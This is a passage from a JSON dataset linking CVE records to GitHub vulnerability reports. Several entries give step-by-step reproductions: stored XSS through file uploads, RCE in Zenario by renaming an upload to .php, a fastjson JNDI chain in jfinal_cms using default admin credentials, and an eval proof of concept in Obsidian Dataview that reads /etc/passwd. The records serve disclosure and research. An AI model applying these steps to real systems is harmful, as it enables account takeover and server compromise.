  72522. "description": "One-click stored XSS from the admin panel to the public site. Log in to the admin panel, go to APITAG, insert the payload into List of subjects APITAG, then go to APITAG and click the subject FILETAG",
  72523. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  72524. "severity": "MEDIUM",
  72525. "baseScore": 5.4,
  72526. "impactScore": 2.7,
  72527. "exploitabilityScore": 2.3
  72528. },
  72529. {
  72530. "CVE_ID": "CVE-2021-41952",
  72531. "Issue_Url_old": "https://github.com/hieuminhnv/Zenario-CMS-9.0-last-version/issues/1",
  72532. "Issue_Url_new": "https://github.com/hieuminhnv/zenario-cms-last-version/issues/1",
  72533. "Repo_new": "hieuminhnv/zenario-cms-last-version",
  72534. "Issue_Created_At": "2021-09-30T08:49:15Z",
  72535. "description": "Stored XSS via uploaded .SVG file in Zenario CMS NUMBERTAG Summary hi team, I found a small XSS via SVG file upload. Info NUMBERTAG Zenario CMS NUMBERTAG last version NUMBERTAG APITAG NUMBERTAG bit) FILETAG Steps NUMBERTAG Log in to the account URLTAG FILETAG NUMBERTAG Choose Users & Contacts and create any user NUMBERTAG Click Image >> Upload an image FILETAG NUMBERTAG use Burp Suite to capture the request and upload the file a.svg (the SVG carrying the script payload) FILETAG NUMBERTAG click the avatar image >> right-click >> Inspect Element (F NUMBERTAG and find the link to the vulnerable svg FILETAG NUMBERTAG Open that link directly in the browser >> the XSS alert fires FILETAG Impact : An attacker can upload a malicious file and, if a victim opens it, steal the victim's cookies, which can lead to account takeover. Anyone viewing a contact's image directly can be a victim. Mitigation: serve user-uploaded SVGs with Content-Disposition: attachment or a restrictive Content-Security-Policy, or sanitize/rasterize them on upload.",
  72536. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  72537. "severity": "MEDIUM",
  72538. "baseScore": 4.8,
  72539. "impactScore": 2.7,
  72540. "exploitabilityScore": 1.7
  72541. },
  72542. {
  72543. "CVE_ID": "CVE-2021-41959",
  72544. "Issue_Url_old": "https://github.com/jerryscript-project/jerryscript/issues/4781",
  72545. "Issue_Url_new": "https://github.com/jerryscript-project/jerryscript/issues/4781",
  72546. "Repo_new": "jerryscript-project/jerryscript",
  72547. "Issue_Created_At": "2021-09-27T07:23:09Z",
  72548. "description": "Unfreed float causing a memory leak in the ecma regexp object. APITAG revision NUMBERTAG ff5bf Build platform Ubuntu NUMBERTAG LTS APITAG NUMBERTAG generic NUMBERTAG Build steps ERRORTAG Test case ERRORTAG Output ERRORTAG Backtrace ERRORTAG Expected behavior According to our analysis, the root cause of this assertion failure is at PATHTAG While getting next_set_status, the function ecma op object APITAG calls the function APITAG, which allocates a NUMBERTAG bit chunk of memory to hold a float number when the index is larger than NUMBERTAG ffffff. This chunk is never freed, which triggers the assertion failure (with assertions disabled this is presumably a leak that crafted regexp input could repeat until memory is exhausted). To fix it, ecma_make_length_value(index) should be replaced by the last_index value already created by ecma regexp APITAG",
  72549. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72550. "severity": "HIGH",
  72551. "baseScore": 7.5,
  72552. "impactScore": 3.6,
  72553. "exploitabilityScore": 3.9
  72554. },
  72555. {
  72556. "CVE_ID": "CVE-2021-42006",
  72557. "Issue_Url_old": "https://github.com/gpertea/gclib/issues/11",
  72558. "Issue_Url_new": "https://github.com/gpertea/gclib/issues/11",
  72559. "Repo_new": "gpertea/gclib",
  72560. "Issue_Created_At": "2021-10-04T15:26:20Z",
  72561. "description": "Uninitialized GFF line info causes an out-of-bounds read and possibly an out-of-bounds write. Reproduce APITAG Input : FILETAG Steps to Reproduce NUMBERTAG Compile FILETAG (will fetch APITAG NUMBERTAG Decompress APITAG input: APITAG NUMBERTAG Run: APITAG Output: APITAG Root Cause URLTAG When APITAG reads a GFF line with no info segment, the APITAG at APITAG is never set, so it takes on whatever stale value happens to be at that stack location. Triggered accidentally, this causes a segfault due to reading an invalid address here: URLTAG However, a maliciously crafted input may be able to place a valid pointer at this location, leading to a more severe vulnerability (the stale value is used as a pointer, so control over it could mean an attacker-controlled read or write). Proposed Patch At a minimum, t should be zeroed during initialization: ERRORTAG Ideally, the library should gracefully handle no info being found (this only works if t is zero initialized): ERRORTAG Credit This bug was detected using AFL URLTAG and localized using ARCUS URLTAG .",
  72562. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  72563. "severity": "HIGH",
  72564. "baseScore": 8.8,
  72565. "impactScore": 5.9,
  72566. "exploitabilityScore": 2.8
  72567. },
  72568. {
  72569. "CVE_ID": "CVE-2021-42057",
  72570. "Issue_Url_old": "https://github.com/blacksmithgu/obsidian-dataview/issues/615",
  72571. "Issue_Url_new": "https://github.com/blacksmithgu/obsidian-dataview/issues/615",
  72572. "Repo_new": "blacksmithgu/obsidian-dataview",
  72573. "Issue_Created_At": "2021-11-04T19:08:34Z",
  72574. "description": "Arbitrary Code Execution via APITAG Queries ( CVETAG ). Describe the bug I discovered a way to craft malicious markdown files that will cause the obsidian dataview plugin to execute arbitrary commands on users\u2019 systems. This is due to the unsafe use of eval within the APITAG URLTAG function located in PATHTAG This has been assigned a CVE of CVETAG CVETAG for tracking. To Reproduce The following proof of concept can be used to display a file on a user\u2019s system by executing the cat command: APITAG dataviewjs APITAG /etc/passwd NUMBERTAG stdout NUMBERTAG dv.span(stdout));\"\" APITAG ` A malicious user could leverage this vulnerability to execute arbitrary code on other users' systems by getting them to open an untrusted markdown file. This is especially dangerous in environments where users share vaults. Expected behavior APITAG should not make an unsafe call to eval using user supplied input. Additional Context Shortly after we privately disclosed this issue, MENTIONTAG promptly changed the default behavior of Dataview to no longer enable APITAG Queries by default (see release FILETAG . This helps protect new dataview users and provides a way for existing dataview users to mitigate this issue by disabling the APITAG Query functionality when opening untrusted markdown. MENTIONTAG is currently working on additional solutions and provided permission for us to open a public issue here for tracking.",
  72575. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  72576. "severity": "HIGH",
  72577. "baseScore": 7.8,
  72578. "impactScore": 5.9,
  72579. "exploitabilityScore": 1.8
  72580. },
  72581. {
  72582. "CVE_ID": "CVE-2021-42171",
  72583. "Issue_Url_old": "https://github.com/hieuminhnv/Zenario-CMS-9.0-last-version/issues/2",
  72584. "Issue_Url_new": "https://github.com/hieuminhnv/zenario-cms-last-version/issues/2",
  72585. "Repo_new": "hieuminhnv/zenario-cms-last-version",
  72586. "Issue_Created_At": "2021-10-05T10:49:07Z",
  72587. "description": "File upload leading to RCE in Zenario CMS NUMBERTAG Summary hi team, I found a high-severity file upload leading to RCE. Info Zenario CMS NUMBERTAG last version APITAG NUMBERTAG bit) FILETAG Steps NUMBERTAG Log in to the account URLTAG FILETAG NUMBERTAG Choose Documents >> Upload documents FILETAG NUMBERTAG Use Burp Suite to capture the upload request for the file FILETAG FILETAG NUMBERTAG Click Edit document metadata >> use Burp Suite to capture the save request FILETAG NUMBERTAG In the current_value field, change the extension value from html to php FILETAG NUMBERTAG Click Actions >> view public link FILETAG APITAG the link as a URL >> BOOM FILETAG Impact : The metadata-edit request lets an authenticated user rename an already-uploaded document to a .php extension, apparently bypassing whatever extension check applies at upload time, so the server then executes it. An attacker could upload a dangerous executable file like a virus, malware, etc. The web server can be compromised by uploading and executing a web shell which can run commands, browse system files, browse local resources, attack other servers, exploit local vulnerabilities, and so forth.",
  72588. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  72589. "severity": "HIGH",
  72590. "baseScore": 7.2,
  72591. "impactScore": 5.9,
  72592. "exploitabilityScore": 1.2
  72593. },
  72594. {
  72595. "CVE_ID": "CVE-2021-42185",
  72596. "Issue_Url_old": "https://github.com/shadoweb/wdja/issues/12",
  72597. "Issue_Url_new": "https://github.com/shadoweb/wdja/issues/12",
  72598. "Repo_new": "shadoweb/wdja",
  72599. "Issue_Created_At": "2021-10-06T08:00:02Z",
  72600. "description": "Wdja NUMBERTAG has a front-end SQL injection vulnerability. There is an SQL injection vulnerability in the front-end (public, unauthenticated) search function, through which an attacker can retrieve the back-end administrator account credentials from the database.",
  72601. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72602. "severity": "CRITICAL",
  72603. "baseScore": 9.8,
  72604. "impactScore": 5.9,
  72605. "exploitabilityScore": 3.9
  72606. },
  72607. {
  72608. "CVE_ID": "CVE-2021-42195",
  72609. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/174",
  72610. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/174",
  72611. "Repo_new": "matthiaskramm/swftools",
  72612. "Issue_Created_At": "2021-10-07T13:17:16Z",
  72613. "description": "A heap buffer overflow (an out-of-bounds READ past the end of a heap allocation, per the ASan report) exists in the function APITAG in swfdump.c. system info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master a9d NUMBERTAG Command line PATHTAG D APITAG APITAG output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG e8d3 at pc NUMBERTAG aca bp NUMBERTAG fffffffdee0 sp NUMBERTAG fffffffded0 READ of size NUMBERTAG at NUMBERTAG e8d3 thread T NUMBERTAG ac9 in APITAG PATHTAG NUMBERTAG in main PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG NUMBERTAG e8d3 is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG fa7 in rfx_alloc PATHTAG NUMBERTAG PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG APITAG Shadow bytes around the buggy address NUMBERTAG c0c7fff9cc NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9cd NUMBERTAG fa fa fa fa fa NUMBERTAG fa NUMBERTAG c0c7fff9ce0: fa fa fa fa NUMBERTAG fa fa fa fa NUMBERTAG c0c7fff9cf NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa fa NUMBERTAG fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa fa NUMBERTAG fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa fa NUMBERTAG c0c7fff9d NUMBERTAG fa fa fa fa fa NUMBERTAG fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING POC APITAG URLTAG",
  72614. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  72615. "severity": "HIGH",
  72616. "baseScore": 7.8,
  72617. "impactScore": 5.9,
  72618. "exploitabilityScore": 1.8
  72619. },
  72620. {
  72621. "CVE_ID": "CVE-2021-42198",
  72622. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/168",
  72623. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/168",
  72624. "Repo_new": "matthiaskramm/swftools",
  72625. "Issue_Created_At": "2021-10-07T12:57:51Z",
  72626. "description": "A NULL pointer dereference exists in the function APITAG in rfxswf.c. system info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master a9d NUMBERTAG Command line PATHTAG D APITAG APITAG output NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG pc NUMBERTAG fac bp NUMBERTAG ffffed NUMBERTAG e0 sp NUMBERTAG fffffffdd NUMBERTAG T NUMBERTAG fab in APITAG PATHTAG NUMBERTAG bf8 in APITAG PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG acd in main PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV PATHTAG APITAG NUMBERTAG ABORTING POC URLTAG",
  72627. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  72628. "severity": "MEDIUM",
  72629. "baseScore": 5.5,
  72630. "impactScore": 3.6,
  72631. "exploitabilityScore": 1.8
  72632. },
  72633. {
  72634. "CVE_ID": "CVE-2021-42204",
  72635. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/169",
  72636. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/169",
  72637. "Repo_new": "matthiaskramm/swftools",
  72638. "Issue_Created_At": "2021-10-07T13:00:58Z",
  72639. "description": "A heap buffer overflow (an out-of-bounds READ that lands before the start of a heap allocation, per the ASan report) exists in the function APITAG in rfxswf.c. system info Ubuntu NUMBERTAG clang NUMBERTAG swfdump (latest master a9d NUMBERTAG Command line PATHTAG D APITAG APITAG output NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG efdf at pc NUMBERTAG d bp NUMBERTAG fffffffdbe0 sp NUMBERTAG fffffffdbd0 READ of size NUMBERTAG at NUMBERTAG efdf thread T NUMBERTAG c in APITAG PATHTAG NUMBERTAG cc in APITAG APITAG NUMBERTAG fbc in APITAG APITAG NUMBERTAG a NUMBERTAG in APITAG APITAG NUMBERTAG c2dc in fontcallback2 PATHTAG NUMBERTAG c6 in APITAG APITAG NUMBERTAG in main PATHTAG NUMBERTAG ffff NUMBERTAG a NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG c NUMBERTAG in _start ( PATHTAG NUMBERTAG efdf is located NUMBERTAG bytes to the left of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ffff6f NUMBERTAG in malloc ( PATHTAG NUMBERTAG fa7 in rfx_alloc PATHTAG NUMBERTAG PATHTAG ) SUMMARY: APITAG heap buffer overflow PATHTAG APITAG Shadow bytes around the buggy address NUMBERTAG c NUMBERTAG fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9df0: fa fa fa fa fa fa fd fd fd fd fa[fa NUMBERTAG fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c NUMBERTAG fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING POC APITAG URLTAG",
  72640. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  72641. "severity": "HIGH",
  72642. "baseScore": 7.8,
  72643. "impactScore": 5.9,
  72644. "exploitabilityScore": 1.8
  72645. },
  72646. {
  72647. "CVE_ID": "CVE-2021-42227",
  72648. "Issue_Url_old": "https://github.com/kindsoft/kindeditor/issues/336",
  72649. "Issue_Url_new": "https://github.com/kindsoft/kindeditor/issues/336",
  72650. "Repo_new": "kindsoft/kindeditor",
  72651. "Issue_Created_At": "2021-10-14T06:26:59Z",
  72652. "description": "There is a stored XSS vulnerability in kindeditor NUMBERTAG APITAG description] > A Cross-Site Scripting (XSS) vulnerability exists in APITAG NUMBERTAG: find an exposed upload endpoint via a Google search for PATHTAG and then upload an .html file to the website that uses this editor (the .html file suffix is allowed by the upload handler). > > > > APITAG Type] > Cross Site Scripting (XSS) > > > > APITAG of Product] > URLTAG > > > > APITAG Product Code Base] > kindeditor NUMBERTAG APITAG Component] > POST PATHTAG HTTP NUMBERTAG Content Disposition: form data; APITAG APITAG > Content Type: text/html > > APITAG APITAG NUMBERTAG APITAG Type] > Remote > > > > APITAG Code execution] > true (note: this is script execution in a victim's browser via the uploaded HTML, not server-side code execution; the CVSS vector reflects XSS impact) > > > > APITAG Vectors] > You just need to search in google: PATHTAG > Then upload the .html file on the website that uses this editor (the file suffix is allowed)",
  72653. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  72654. "severity": "MEDIUM",
  72655. "baseScore": 6.1,
  72656. "impactScore": 2.7,
  72657. "exploitabilityScore": 2.8
  72658. },
  72659. {
  72660. "CVE_ID": "CVE-2021-42242",
  72661. "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/28",
  72662. "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/28",
  72663. "Repo_new": "jflyfox/jfinal_cms",
  72664. "Issue_Created_At": "2021-10-10T14:34:59Z",
  72665. "description": "Administrator Interface Command Execution Vulnerability. Vulnerability summary A command execution vulnerability exists in jfinal_cms NUMBERTAG: the /ueditor route parses a file with fastjson, and that file can be replaced from the administrator's template management page, so an attacker with admin access can trigger a fastjson JNDI (RMI/LDAP) deserialization chain. JDK version requirements: JDK version used based on RMI NUMBERTAG u NUMBERTAG u NUMBERTAG u NUMBERTAG JDK version used based on LDAP NUMBERTAG u NUMBERTAG u NUMBERTAG u NUMBERTAG (presumably because the JNDI chain only works on JDK builds that still allow remote class loading) jfinal_cms version NUMBERTAG fastjson APITAG FILETAG vulnerability reproduction JDK version used in the test: JDK8u NUMBERTAG Run the tool on kali, start rmi and ldap services URLTAG APITAG FILETAG replace rmi or ldap address in payload: CODETAG Create the FILETAG file and copy the payload in FILETAG Log in to the backstage management system (note: the reproduction requires an authenticated administrator, which the CVSS vector's PR:N does not reflect), select template management default password:admin/admin NUMBERTAG FILETAG Click FILETAG FILETAG Click Replace file FILETAG Replace with the FILETAG file containing the payload just created FILETAG Visit /ueditor, execute the command to pop up the calculator APITAG FILETAG Vulnerability analysis APITAG The APITAG class is instantiated in the index method of the /ueditor route FILETAG APITAG The APITAG class is instantiated in the constructor of the APITAG class FILETAG APITAG The constructor of APITAG calls APITAG FILETAG APITAG Call APITAG to parse the file content, and the file content here is controllable: just replace the file content with the payload. FILETAG APITAG The file comes from APITAG . With any file upload vulnerability in the backstage, this file can be replaced with a file containing the payload to trigger fastjson deserialization FILETAG FILETAG",
  72666. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  72667. "severity": "CRITICAL",
  72668. "baseScore": 9.8,
  72669. "impactScore": 5.9,
  72670. "exploitabilityScore": 3.9
  72671. },
  72672. {
  72673. "CVE_ID": "CVE-2021-42244",
  72674. "Issue_Url_old": "https://github.com/PaquitoSoft/Notimoo/issues/3",
  72675. "Issue_Url_new": "https://github.com/paquitosoft/notimoo/issues/3",
  72676. "Repo_new": "paquitosoft/notimoo",
  72677. "Issue_Created_At": "2021-08-12T20:12:15Z",
  72678. "description": "XSS via title, message. FILETAG NUMBERTAG has an XSS vulnerability which is triggered when a title or message containing JavaScript code is set in a notification (the values are inserted into the DOM without escaping). FILETAG POC Create a notification with a JavaScript payload: ERRORTAG Affected lines: URLTAG URLTAG",
  72679. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  72680. "severity": "MEDIUM",
  72681. "baseScore": 6.1,
  72682. "impactScore": 2.7,
  72683. "exploitabilityScore": 2.8
  72684. },
  72685. {
  72686. "CVE_ID": "CVE-2021-42248",
  72687. "Issue_Url_old": "https://github.com/tidwall/gjson/issues/237",
  72688. "Issue_Url_new": "https://github.com/tidwall/gjson/issues/237",
  72689. "Repo_new": "tidwall/gjson",
  72690. "Issue_Created_At": "2021-10-08T09:28:45Z",
  72691. "description": "APITAG can cause APITAG attacks. GJSON NUMBERTAG allows attackers to cause a ReDoS (regular-expression denial of service, i.e. excessive CPU time in the matcher) via crafted JSON input. func APITAG { APITAG := APITAG APITAG APITAG }",
  72692. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72693. "severity": "HIGH",
  72694. "baseScore": 7.5,
  72695. "impactScore": 3.6,
  72696. "exploitabilityScore": 3.9
  72697. },
  72698. {
  72699. "CVE_ID": "CVE-2021-42248",
  72700. "Issue_Url_old": "https://github.com/tidwall/gjson/issues/236",
  72701. "Issue_Url_new": "https://github.com/tidwall/gjson/issues/236",
  72702. "Repo_new": "tidwall/gjson",
  72703. "Issue_Created_At": "2021-10-01T04:53:27Z",
  72704. "description": "APITAG can cause APITAG attacks. GJSON NUMBERTAG allows attackers to cause a ReDoS (regular-expression denial of service, i.e. excessive CPU time in the matcher) via crafted JSON input. func APITAG { APITAG := APITAG APITAG APITAG }",
  72705. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72706. "severity": "HIGH",
  72707. "baseScore": 7.5,
  72708. "impactScore": 3.6,
  72709. "exploitabilityScore": 3.9
  72710. },
  72711. {
  72712. "CVE_ID": "CVE-2021-42341",
  72713. "Issue_Url_old": "https://github.com/OpenRC/openrc/issues/459",
  72714. "Issue_Url_new": "https://github.com/openrc/openrc/issues/459",
  72715. "Repo_new": "openrc/openrc",
  72716. "Issue_Created_At": "2021-10-08T01:34:40Z",
  72717. "description": "checkpath APITAG invalid pointer. I am a long-time Gentoo user. I run Gentoo stable and unstable on a wide range of machines. On just one, a Gentoo unstable, running on a znver2 CPU, I get this error: APITAG This has persisted for months. I have done \"emerge e world\" many times, with various mtune, march, etc. and nothing affects the result. So I did a \"git pull\", looked at PATHTAG and then made this one change: CODETAG The problem goes away. Looks like APITAG is just a wrapper on APITAG According to \"man strlen\" ERRORTAG It looks to me like \"str\" is not big enough to hold \"path\" including its trailing NUMBERTAG terminator, i.e. an off-by-one overflow of the buffer; the write past the end of the allocation is presumably what corrupts the heap and makes \"free(path);\" fail with an invalid pointer. But I'm glad the change fixes it.",
  72718. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72719. "severity": "HIGH",
  72720. "baseScore": 7.5,
  72721. "impactScore": 3.6,
  72722. "exploitabilityScore": 3.9
  72723. },
  72724. {
  72725. "CVE_ID": "CVE-2021-42341",
  72726. "Issue_Url_old": "https://github.com/OpenRC/openrc/issues/418",
  72727. "Issue_Url_new": "https://github.com/openrc/openrc/issues/418",
  72728. "Repo_new": "openrc/openrc",
  72729. "Issue_Created_At": "2021-04-07T17:25:51Z",
  72730. "description": "PATHTAG is broken in most recent release. CODETAG Not sure what's going on here, so I straced it: CODETAG ltrace: ERRORTAG",
  72731. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  72732. "severity": "HIGH",
  72733. "baseScore": 7.5,
  72734. "impactScore": 3.6,
  72735. "exploitabilityScore": 3.9
  72736. },
  72737. {
  72738. "CVE_ID": "CVE-2021-42585",
  72739. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/351",
  72740. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/351",
  72741. "Repo_new": "libredwg/libredwg",
  72742. "Issue_Created_At": "2021-06-07T07:50:57Z",
  72743. "description": "Heap buffer overflow in copy_compressed_bytes in APITAG Affected version the latest commit URLTAG and NUMBERTAG What's the problem? A heap buffer overflow was discovered in copy_compressed_bytes in APITAG ASAN report: ERRORTAG Compile command APITAG How can we reproduce the issue? ERRORTAG POC file : FILETAG",
  72744. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  72745. "severity": "HIGH",
  72746. "baseScore": 8.8,
  72747. "impactScore": 5.9,
  72748. "exploitabilityScore": 2.8
  72749. },
  72750. {
  72751. "CVE_ID": "CVE-2021-42586",
  72752. "Issue_Url_old": "https://github.com/LibreDWG/libredwg/issues/350",
  72753. "Issue_Url_new": "https://github.com/libredwg/libredwg/issues/350",
  72754. "Repo_new": "libredwg/libredwg",
  72755. "Issue_Created_At": "2021-06-07T07:46:30Z",
  72756. "description": "Heap buffer overflow in copy_bytes in APITAG Affected version the latest commit URLTAG and NUMBERTAG What's the problem? A heap buffer overflow was discovered in copy_bytes in APITAG ASAN report: ERRORTAG Compile command APITAG How can we reproduce the issue? ERRORTAG POC file : FILETAG",
  72757. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  72758. "severity": "HIGH",
  72759. "baseScore": 8.8,
  72760. "impactScore": 5.9,
  72761. "exploitabilityScore": 2.8
  72762. },
  72763. {
  72764. "CVE_ID": "CVE-2021-42715",
  72765. "Issue_Url_old": "https://github.com/nothings/stb/issues/1224",
  72766. "Issue_Url_new": "https://github.com/nothings/stb/issues/1224",
  72767. "Repo_new": "nothings/stb",
  72768. "Issue_Created_At": "2021-10-07T20:06:19Z",
  72769. "description": "In stb_image's HDR reader, loading a specially constructed invalid HDR file can result in an infinite loop within the RLE decoder. Describe the bug In stb_image's HDR reader, loading a specially constructed invalid HDR file can result in an infinite loop within the RLE decoder. This issue includes a fix in pull request NUMBERTAG and a proof of concept file that can be used to reproduce the crash. We're reporting this on APITAG Issues following the guidance in issue NUMBERTAG The issue occurs in this loop URLTAG within APITAG : CODETAG The proof of concept file manages to get this part of the decoder into a state where: nleft is equal to NUMBERTAG s is at the end of the file. Because s is at the end of the file, APITAG always returns NUMBERTAG since APITAG here: CODETAG This means that count is always set to NUMBERTAG this passes the error check, but doesn't affect any program state, meaning that the loop runs forever, an availability issue. To Reproduce This .zip contains a NUMBERTAG KB .hdr file, APITAG which reproduces this issue: FILETAG Calling APITAG with a path to this file never returns. I was able to verify this using tests/image_test.c (modified slightly in order to build) on Windows version NUMBERTAG H2 with Microsoft Visual Studio NUMBERTAG and I expect it should reproduce on other systems as well. This file was found using the Radamsa fuzzer URLTAG . I think this particular file works by setting the RLE flags on the last scanline in the file and being truncated in just the right place, but I'm not NUMBERTAG sure. Expected behavior stbi_load should eventually return. Based on Bruce Walter's FILETAG , it seems like the intended behavior is that a run length of NUMBERTAG should be treated as invalid, which is the approach the pull request takes. However, other solutions are possible (e.g. detecting when the end of the file has been reached) I don't have any preference either way. Thanks!",
  72770. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  72771. "severity": "MEDIUM",
  72772. "baseScore": 5.5,
  72773. "impactScore": 3.6,
  72774. "exploitabilityScore": 1.8
  72775. },
  72776. {
  72777. "CVE_ID": "CVE-2021-42716",
  72778. "Issue_Url_old": "https://github.com/nothings/stb/issues/1166",
  72779. "Issue_Url_new": "https://github.com/nothings/stb/issues/1166",
  72780. "Repo_new": "nothings/stb",
  72781. "Issue_Created_At": "2021-07-14T10:52:47Z",
  72782. "description": "stbi__pnm_load heap buffer overflow bug . i find a heap buffer overflow(oob read) FILETAG in stbi__pnm_load, if req_comp && req_comp != s >img_n, the will call stbi__convert_format, But it does not multiply ri >bits_per_channel NUMBERTAG if ri.bits_per_channel NUMBERTAG will call stbi__convert NUMBERTAG to NUMBERTAG and make oob read APITAG ERRORTAG",
  72783. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H",
  72784. "severity": "HIGH",
  72785. "baseScore": 7.1,
  72786. "impactScore": 5.2,
  72787. "exploitabilityScore": 1.8
  72788. },
  72789. {
  72790. "CVE_ID": "CVE-2021-42716",
  72791. "Issue_Url_old": "https://github.com/nothings/stb/issues/1225",
  72792. "Issue_Url_new": "https://github.com/nothings/stb/issues/1225",
  72793. "Repo_new": "nothings/stb",
  72794. "Issue_Created_At": "2021-10-07T20:08:31Z",
